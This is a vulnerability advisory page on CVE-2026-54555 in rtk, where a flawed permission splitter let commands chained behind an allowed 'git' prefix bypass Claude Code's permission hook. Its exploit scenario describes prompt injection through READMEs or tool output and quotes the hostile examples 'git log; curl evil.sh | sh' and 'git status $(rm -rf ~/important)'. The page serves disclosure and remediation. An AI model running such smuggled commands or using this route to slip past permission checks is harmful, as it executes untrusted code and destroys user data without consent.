Skip to main content

rtk EUVDEUVD-2026-38573

| CVE-2026-54555 HIGH
Incorrect Authorization (CWE-863)
2026-06-23 GitHub_M
7.8
CVSS 3.1 · Vendor: GitHub_M
Share

Severity by source

Vendor (GitHub_M) PRIMARY
7.8 HIGH
AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
vuln.today AI
7.8 HIGH

Local hook on the developer host (AV:L); attacker is unprivileged injected content (PR:N) but needs the user to approve the Claude action (UI:R); arbitrary command execution yields C/I/A:H.

3.1 AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
4.0 AV:L/AC:L/AT:N/PR:N/UI:A/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N

Primary rating from Vendor (GitHub_M).

CVSS VectorVendor: GitHub_M

CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
Attack Vector
Local
Attack Complexity
Low
Privileges Required
None
User Interaction
Required
Scope
Unchanged
Confidentiality
High
Integrity
High
Availability
High

Lifecycle Timeline

2
Patch available
Jun 23, 2026 - 21:02 EUVD
Analysis Generated
Jun 23, 2026 - 20:16 vuln.today

DescriptionCVE.org

rtk filters and compresses command outputs before they reach your LLM context. Prior to 0.42.2, the permission splitter did not conservatively split or reject several shell constructs that Bash treats as command execution boundaries or nested execution. As a result, a command beginning with an allowed prefix such as git could hide a second command behind one of these constructs. rtk rewrite returned exit code 0, causing the Claude hook to emit permissionDecision: "allow". The rewritten command still contained the hidden command, so it ran without the user confirmation or denial that the permission rules were intended to enforce. This vulnerability is fixed in 0.42.2.

AnalysisAI

Authorization bypass in rtk (rtk-ai) prior to 0.42.2 allows hidden command execution to slip past the permission splitter that gates the Claude Code permission hook. Because the splitter fails to handle Bash command-execution boundary constructs (such as command substitution and chained operators) inside an allowlisted prefix like git, rtk rewrite returns exit code 0 and the hook emits permissionDecision: "allow", causing the secondary command to execute without the user confirmation the policy was supposed to require. …

Unlock full vulnerability intelligence

  • Risk assessment & exploitation conditions
  • Attack chain visualization
  • Remediation with exact patch versions
  • Threat intelligence from 22 sources
  • Personal watchlist & email alerts

Free forever · No credit card required

Attack ChainAIDerived

Hypothetical attack flow derived from CVE metadata

Access
Plant injected instructions in LLM-reachable content
Delivery
Model proposes git command with hidden chained payload
Exploit
User approves the Claude action
Execution
rtk splitter validates only the git prefix and returns allow
Persist
Hidden command executes locally as the user
Impact
Arbitrary code execution and data compromise

Vulnerability AssessmentAI

Exploitation Requires (1) rtk at a version below 0.42.2 installed and wired into Claude Code as the permission hook that produces permissionDecision, (2) an allowlist that includes at least one prefix the attacker can lead with (the advisory cites git as an example), (3) attacker-controlled text reaching the LLM context - typically via prompt injection from repository content, tool output, web fetches, or pasted material - and (4) the user accepting the resulting Claude action (UI:R). … Additional conditions and limiting factors are described in the full assessment.
Risk Assessment The NVD CVSS 3.1 vector AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H scores 7.8 (High) and is consistent with the described threat model: the attacker is unprivileged content (a malicious prompt or untrusted tool output flowing into the LLM context) that must trick the user into permitting the Claude action, which then runs locally with the user's privileges. … Full risk analysis with EPSS, KEV, and SSVC signal comparison available after sign-in.
Exploit Scenario An attacker poisons content that ends up in the developer's Claude Code context - for example a README, issue comment, search result, or tool output - instructing the model to run something like git log; curl evil.sh | sh or git status $(rm -rf ~/important). The user accepts the seemingly benign git action, rtk's splitter sees the git prefix and returns allow with exit code 0, and the chained payload executes locally with the user's privileges. …
Remediation Vendor-released patch: upgrade rtk to 0.42.2 or later, which hardens the permission splitter to conservatively reject or split on Bash command-execution boundary constructs; details are in advisory GHSA-7gxq-fvfc-g327 (https://github.com/rtk-ai/rtk/security/advisories/GHSA-7gxq-fvfc-g327). … Detailed patch versions, workarounds, and compensating controls in full report.

Recommended ActionAI

Within 24 hours: Identify all Claude Code deployments and document active permission policies in use. …

Sign in for detailed remediation steps and compensating controls.

Threat intelligence, references, and detailed analysis are available after sign-in.

Share

EUVD-2026-38573 vulnerability details – vuln.today

This site uses cookies essential for authentication and security. No tracking or analytics cookies are used. Privacy Policy